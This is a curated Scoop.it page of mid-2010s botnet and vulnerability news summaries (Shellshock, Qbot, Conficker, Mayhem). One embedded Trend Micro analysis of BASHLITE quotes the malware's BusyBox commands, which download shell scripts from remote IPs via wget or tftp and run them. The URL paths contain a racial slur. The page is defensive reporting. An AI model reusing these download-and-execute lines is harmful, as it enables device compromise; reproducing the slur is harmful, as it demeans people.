Botnets
Follow
Find
434 views | +0 today
 
Scooped by The Historical Cyber Consortium
onto Botnets
Scoop.it!

Sweet Orange Dropping some Sweet Botnet action - Zscaler Analyst ...

Sweet Orange Dropping some Sweet Botnet action - Zscaler Analyst ... | Botnets | Scoop.it
Sweet Orange Dropping some Sweet Botnet action. I recently saw a very thorough blog on a new flavor of the Sweet Orange Exploit Kit and thought I might throw in some additional research I found. So let's start with what we ...
more...
No comment yet.
Your new post is loading...
Your new post is loading...
Scooped by The Historical Cyber Consortium
Scoop.it!

The Rebirth of Dofoil

The Rebirth of Dofoil | Botnets | Scoop.it
Dofoil, also known as Smoke Loader, is a modularized botnet that has existed for a few years. Since 2013, we have not received any new variants of this bot and the command-and-control (C&C) servers of its previous variants are no longer accessibl...
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

A Killer Combo: Critical Vulnerability and 'Godmode' Exploitation on CVE-2014-6332

A Killer Combo: Critical Vulnerability and 'Godmode' Exploitation on CVE-2014-6332 | Botnets | Scoop.it
A proof of concept exploit for a Windows vulnerability has recently been published by a Chinese researcher and shows that it’s fairly simple to write malicious VBScript code for attacks for unpatched s
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

Is MS14-066 the Windows Shellshock?

Is MS14-066 the Windows Shellshock? | Botnets | Scoop.it
The latest Patch Tuesday from Microsoft (November 11, 2014) includes fixes for some major vulnerabilities, including remote code execution bugs affecting core Windows components and Internet Explorer.
more...
No comment yet.
Scooped by The Historical Cyber Consortium from Surfing the Broadband Bit Stream
Scoop.it!

Report: Criminals use Shellshock against mail servers to build botnet

Report: Criminals use Shellshock against mail servers to build botnet | Botnets | Scoop.it
Targeting message transfer agents (MTAs), mail delivery agents (MDAs), and spam filters, criminals are using Shellshock as a means to create botnets.

Via Chuck Sherwood, Senior Associate, TeleDimensions, Inc
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

MIS-Asia - Report: Criminals use Shellshock against mail servers to build botnet

MIS-Asia - Report: Criminals use Shellshock against mail servers to build botnet | Botnets | Scoop.it
MIS Asia offers Information Technology strategy insight for senior IT management - resources to understand and leverage information technology from a business leadership perspective
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

Malware-Traffic-Analysis.net - 2014-10-28 - Asprox botnet serving free pizza

Malware-Traffic-Analysis.net - 2014-10-28 - Asprox botnet serving free pizza | Botnets | Scoop.it
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

Semalt Hijacks Hundreds of Thousands of PCs for Massive Botnet

The spam bot is being used to carry out a large-scale, global offensive bent on fooling search algorithims.
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

Virus Bulletin : Mayhem – a hidden threat for *nix web servers

Virus Bulletin : Mayhem – a hidden threat for *nix web servers | Botnets | Scoop.it
Andrew Kovalev and colleagues describe ‘Mayhem’ – a new kind of
malware for *nix web servers that has the functions of a traditional
Windows bot, but which can act under restricted privileges in the
system.
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

Windows XP flaws help Russian 'Qbot' gang build 500,000 PC botnet

Windows XP flaws help Russian 'Qbot' gang build 500,000 PC botnet | Botnets | Scoop.it
But are botnets becoming yesterday's worry?
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

Researchers say Conficker is all about the money - CNET

Researchers say Conficker is all about the money - CNET | Botnets | Scoop.it
Conficker's ties to a large spamming and password-stealing botnet give credence to the speculation that money, and possibly malicious Eastern European hackers, are behind the latest Internet worm infection.
The Historical Cyber Consortium's insight:

From 2009,  but..

more...
Scooped by The Historical Cyber Consortium
Scoop.it!

Botnet Twists the Knife in iCloud Security | Malware | TechNewsWorld

Botnet Twists the Knife in iCloud Security | Malware | TechNewsWorld | Botnets | Scoop.it
Hot on the heels of hackers stealing celebrities' nude photos from their iCloud accounts and posting them on the Web comes news that iCloud users are being targeted again.
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

First Shellshock botnet attacks Akamai, US DoD networks

First Shellshock botnet attacks Akamai, US DoD networks | Botnets | Scoop.it
Wopbot on the rampage.(Wopbot launched a distributed denial of service attack against servers hosted by content delivery network Akamai read http://t.co/53Fk6oILMw)...
more...
No comment yet.
Scooped by The Historical Cyber Consortium from SSH infosecuration
Scoop.it!

Microsoft SSL bug could be worse than Heartbleed, say researchers

Microsoft SSL bug could be worse than Heartbleed, say researchers | Botnets | Scoop.it
Reseachers say the SSL flaw in most versions of Microsoft Windows could be worse than Heartbleed and Shellshock

Via SSH Communications Security
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

BASHLITE Affects Devices Running on BusyBox

BASHLITE Affects Devices Running on BusyBox | Botnets | Scoop.it
When news of the Shellshock vulnerability broke out at the end of September, we spotted several attacks that leveraged the said vulnerability, thus manifesting the prevalence or even evolution on how attackers used the exploit. For instance, attackers used Shellshock to target SMTP servers, launch botnet attacks, and even to download KAITEN source code among others. We have continuously monitored this vulnerability and on our latest research, we observed that recent samples of BASHLITE (detected by Trend Micro as ELF_BASHLITE.SMB) scans the network for devices/machines running on BusyBox, and logs in using a set of usernames and passwords (see figure 4 below). Once a connection is established, it runs the command to download and run bin.sh and bin2.sh scripts, gaining control over the Busybox system. BusyBox is built on top of the Linux kernel and used by small devices such as routers. Remote attackers can possibly maximize their control on affected devices by deploying other components or malicious software into the system depending on their motive. This is seen in the following commands: cd /tmp busybox wget http://6916337115/.niggers/bin.sh busybox tftp -r bin.sh -g 696337115 sh bin.sh echo -e 'x62x69x6ex66x61x67x74'rn cd /tmp/ busybox wget http://1761025037/.niggers/bin2.sh busybox tftp -r bin2.sh -g 1761025037 sh bin2.sh echo -e 'x62x69x6ex66x61x67x74'rn This means that the malware can do the following commands on the affected devices: Change to the temporary folder where generally there is file write access Download a remote file, depending on whether the shell script is hosted via HTTP or TFTP.  There is ‘fail-safe’ mechanism to achieve its download routine. This means that if in the first command, it doesn’t execute any file, it will try again to connect to the URL and download the file. Run the downloaded shell script. Perform previous “fingerprinting” routine, to check if the device runs on BusyBox. Figure 1. Code snippets of BASHLITE downloading files via BusyBox The previous BASHLITE sample (detected as ELF_BASHLITE.A) used BusyBox just to echo the string 'gayfgt' if the remote malicious user invokes the command SCANNER ON: Figure 2. Scanner mode 'ON' Figure 3. Code snippet of ELF_BASHLITE.A where the string, ‘gayfgt’ is represented in octal form This is done to check if the device runs BusyBox, however it does not execute any commands (unlike the new samples). BASHLITE attempts to log into the remote systems by using the default set of usernames and passwords: Figure 4. Set of usernames and passwords User Impact and Countermeasures Devices running on BusyBox can be possibly affected by BASHLITE. As such, a remote attacker can issue commands or download other files on the devices thus compromising its security.  Since the initial discovery of Shellshock vulnerability, Trend Micro has provided protection via Deep Security rules and Smart Protection Network that detects the exploit and all related malware payload. We strongly advised users to change the default usernames and passwords and disable remote shell if possible to these devices. For more information on Shellshock vulnerability, you can read our Summary of Shellshock-Related Stories and Materials. Users can also get free protection from Shellshock via these tools. The following hashes are related to this threat: ffaa3c714ae82f954089f49828dac795327bf26e e51ad7cc8de05dc7991e591ee2f4eb53b8f05ae4 82e47cdbedeef6812ea84549ffc2f385a03e57de fd5c0f7575e6aa1f9cea5bb3977d6e037bfe6421 With additional insights from Joseph Cepe
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

Timeline of Sandworm Attacks | Security Intelligence Blog | Trend Micro

Timeline of Sandworm Attacks | Security Intelligence Blog | Trend Micro | Botnets | Scoop.it
What can we learn from the timeline of Sandworm attacks?
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

Northern Gold criminal gang infected half million PCs worldwide

Northern Gold criminal gang infected half million PCs worldwide | Botnets | Scoop.it
Proofpoint firm uncovered a malicious campaign run by the Northern Gold criminal group which is targeting online banking users with a botnet of 500,000 PCs.
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

Hackers Are Using Gmail Drafts to Update Their Malware and Steal Data | WIRED

Hackers Are Using Gmail Drafts to Update Their Malware and Steal Data | WIRED | Botnets | Scoop.it
In his career-ending extramarital affair that came to light in 2012, General David Petraeus used a stealthy technique to communicate with his lover Paula Broadwell: the pair left messages for each other in the drafts folder of a shared Gmail account. Now hackers have learned the same trick. Only instead of a mistress, they're sharing their love letters with data-stealing malware buried deep on a victim's computer.
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

Apple anti-malware update blocks new 'iWorm' Mac botnet | ZDNet

Apple anti-malware update blocks new 'iWorm' Mac botnet | ZDNet | Botnets | Scoop.it
Mac users should be protected from a new malware threat that has infected around 18,000 users across the world.
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

Apple anti-malware update blocks new 'iWorm' Mac botnet - ZDNet

Apple anti-malware update blocks new 'iWorm' Mac botnet - ZDNet | Botnets | Scoop.it
Mac users should be protected from a new malware threat that has infected around 18,000 users across the world.
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

Linux botnet Mayhem spreads through Shellshock exploits

Linux botnet Mayhem spreads through Shellshock exploits | Botnets | Scoop.it
The botnet targets Web servers that haven't been patched for recent vulnerabilities found in the Bash Linux shell.
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

Massive Qbot Botnet strikes 500,000 Machines Through WordPress

Massive Qbot Botnet strikes 500,000 Machines Through WordPress. Attackers steal banking credentials and hire out compromised computers to others
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

Conficker Most Reported Security Threat in 2014 So Far

Conficker Most Reported Security Threat in 2014. F-Secure finds six-year-old worm persists thanks to unpatched systems
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

Yahoo Wasn’t Shellshocked in Server Attack, CISO Claims

Yahoo Wasn’t Shellshocked in Server Attack, CISO Claims. Web pioneer hit by similar looking bug but no user data affected
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

[Honeypot Alert] New Bot Malware (BoSSaBoTv2) Attacking Web Servers Discovered - SpiderLabs Anterior

[Honeypot Alert] New Bot Malware (BoSSaBoTv2) Attacking Web Servers Discovered - SpiderLabs Anterior | Botnets | Scoop.it
Our web honeypots picked up some interesting attack traffic. The initial web application attack vector (PHP-CGI vulnerability) is not new, the malware payload is.
more...
No comment yet.